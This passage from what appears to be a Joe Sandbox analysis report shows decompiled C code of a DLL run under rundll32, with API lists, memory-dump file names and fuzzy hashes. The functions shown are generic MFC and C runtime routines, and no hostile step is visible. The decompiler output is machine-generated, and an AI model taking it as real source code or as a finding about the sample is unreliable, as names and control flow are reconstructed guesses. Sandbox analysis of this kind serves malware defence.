					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E1001C573( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E1001C68D( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E1001C573( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E1001C68D( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E1001C573( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E1001C68D( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

APIs

_memset.LIBCMT ref: 1001C702

Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7

GetFileTime.KERNEL32(?,?,?,?), ref: 1001C739
GetFileSize.KERNEL32(?,00000000), ref: 1001C74E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
Instruction ID: 51a8328b60633bd59e5f15858ada0f86eee49ce44263773015f9aa20d2328a8a
Opcode Fuzzy Hash: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
Instruction Fuzzy Hash: 0B410C759047099FC724CF68C881C9AB7F8FF087607118A2DE5A6DB691E770F984CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000F366 Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000F366(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001B8D6( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E1000911A( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E1000911A( &_a4)));
								_v8 =  *((intOrPtr*)(E1000911A( &_a4)));
								if((E1000F07E(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1000F16D( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1000F16D( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1000F07E(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

APIs

SendMessageA.USER32 ref: 1000F39A
SendMessageA.USER32 ref: 1000F3FF
SendMessageA.USER32 ref: 1000F444
SendMessageA.USER32 ref: 1000F46D

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
Instruction ID: f3d15569573835c18d81f199704cf95a6a2abc57fcee4060fc3bf4c3a8b62e7d
Opcode Fuzzy Hash: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
Instruction Fuzzy Hash: A9317E30501219FFEB15DF51C881EAF3BA9EF417D0F10806AF9059B619DA70AD80EB91

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB82 Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002DB82(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1002276D( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1002D2BC( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10020B71(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1002DBB2
__isleadbyte_l.LIBCMT ref: 1002DBE6
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC17
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC85

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
Instruction ID: 37aa916cde1404fb766b6052f6d7e43a4bf17a9cf34586f159c1b1eafb0ae636
Opcode Fuzzy Hash: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
Instruction Fuzzy Hash: 9131F231A0028AEFDB12EF64DC90AAE7BE5FF00351FA285AAE4608B191D370DD40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10016C75 Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10016C75(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E1001FBC4(E10034195, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x10038988;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E1000EC55(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E10004E6E(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E1000FFD3(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E10010292(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E1000FD9F( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E1000E519();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
						E100102E5(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E1000E519();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
					E100102E5(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E1001FC9C(_t53);
			}

APIs

__EH_prolog3.LIBCMT ref: 10016C7C

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetDC.USER32(?), ref: 10016CFA
IntersectRect.USER32 ref: 10016D34
CreateRectRgnIndirect.GDI32(?), ref: 10016D3E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
String ID:
API String ID: 2872313494-0
Opcode ID: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
Instruction ID: aba366ee442878ba1e0e253a8bcb53805126a2189cb4a44b534bc72d57d8081b
Opcode Fuzzy Hash: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
Instruction Fuzzy Hash: 45316A75D0026ADFDF02CFA4CD85AAEBBB5FF08340F118096E541AF141D775AA81CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10011620 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10011620(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000EC3C(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000EC09(_t51, _t65, 0, _t77) + 4));
					_t70 = E1001063D(0x10048490);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E10022FC3(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E1001F6F4(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001F631(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001F631(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E10022FC3(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E100069D9();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E10011554( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

APIs

__msize.LIBCMT ref: 100116B1
__msize.LIBCMT ref: 100116D4
_malloc.LIBCMT ref: 100116EC
_malloc.LIBCMT ref: 10011701

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
Instruction ID: f1eca33ff59634d1dad84df821d0f84545a75b9cee29ec0de7196f6c68877e4a
Opcode Fuzzy Hash: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
Instruction Fuzzy Hash: F1218F346047019BDB58EF74D881ADA77F6EF45291B11852AF8198F296DB30ECD1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1001EB9E Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1001EB9E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1001FBC4(E10034B90, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E1000EC55(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E1000E519();
						}
						L17:
						return E1001FC9C(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E1000E519();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1001EBA5
PeekMessageA.USER32 ref: 1001EBFF
PeekMessageA.USER32 ref: 1001EC16
PeekMessageA.USER32 ref: 1001EC50

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
Instruction ID: 7a5ad787edd883707f1bdef7fe17baf98f592d1ae8ded73e135a3cc4ce0c4401
Opcode Fuzzy Hash: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
Instruction Fuzzy Hash: 98314B75A0068AEFDB20DFA4CD95EAE73E8FF04744F110919F652AA181D770EE818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1001338A Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E1001338A(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x10045580; // 0x2ef01728
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E100235A2(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E100235A2( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E100234D2( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E100233E3();
						} else {
							_t23 = E100233BA();
						}
						L17:
						return E1001FBB5(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}

APIs

CharNextA.USER32(?), ref: 100133E1

Part of subcall function 100235A2: __ismbcspace_l.LIBCMT ref: 100235A8

CharNextA.USER32(00000000), ref: 100133FE
_strtol.LIBCMT ref: 10013429
_strtoul.LIBCMT ref: 10013430

Part of subcall function 100233E3: strtoxl.LIBCMT ref: 10023403

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
Instruction ID: f08684c254250480d72764a4ddbea2980768ff31fde62085fc420af539802239
Opcode Fuzzy Hash: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
Instruction Fuzzy Hash: 132124725002959BCB11DB758C81BAAB7E8EF49240F9180A6F991DB041DB70EE848B65

Uniqueness

Uniqueness Score: -1.00%

Function 1001829A Relevance: 6.1, APIs: 4, Instructions: 70
